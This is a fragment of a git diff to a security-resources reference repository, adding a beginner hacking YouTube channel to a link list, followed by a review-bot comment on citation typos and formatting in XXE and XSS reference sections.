Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Juien SZLAMOWICZ, Sebastien DUDEK diff --git a/YOUTUBE.md b/YOUTUBE.md index ba90f41..c1ed1b9 100644 --- a/YOUTUBE.md +++ b/YOUTUBE.md @@ -9,6 +9,7 @@ - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) +- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) ## Conferences
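Review bot: in the XXE reference hunk, `Juien SZLAMOWICZ` misspells the Synacktiv author's first name (Julien), `SynAcktiv` should be `Synacktiv`, and the reworked Mainka entry keeps the German `Von` (`by`) in `6. Nov. 2014 - Von Christian Mainka` although the other entries use `by`. The `Understanding Xxe From Basic To Blind` entry is removed without a replacement; if the link is dead, an archived copy keeps the citation. In the XSS WAF hunk, the two new Cloudflare sub-sections (`21st april 2020`, `22nd august 2019`) show empty `html` fences in this view, so the payloads need checking in the rendered file, and the month names should be capitalised like the rest of the README. Unifying the XXE list markers to `*` is a welcome cleanup.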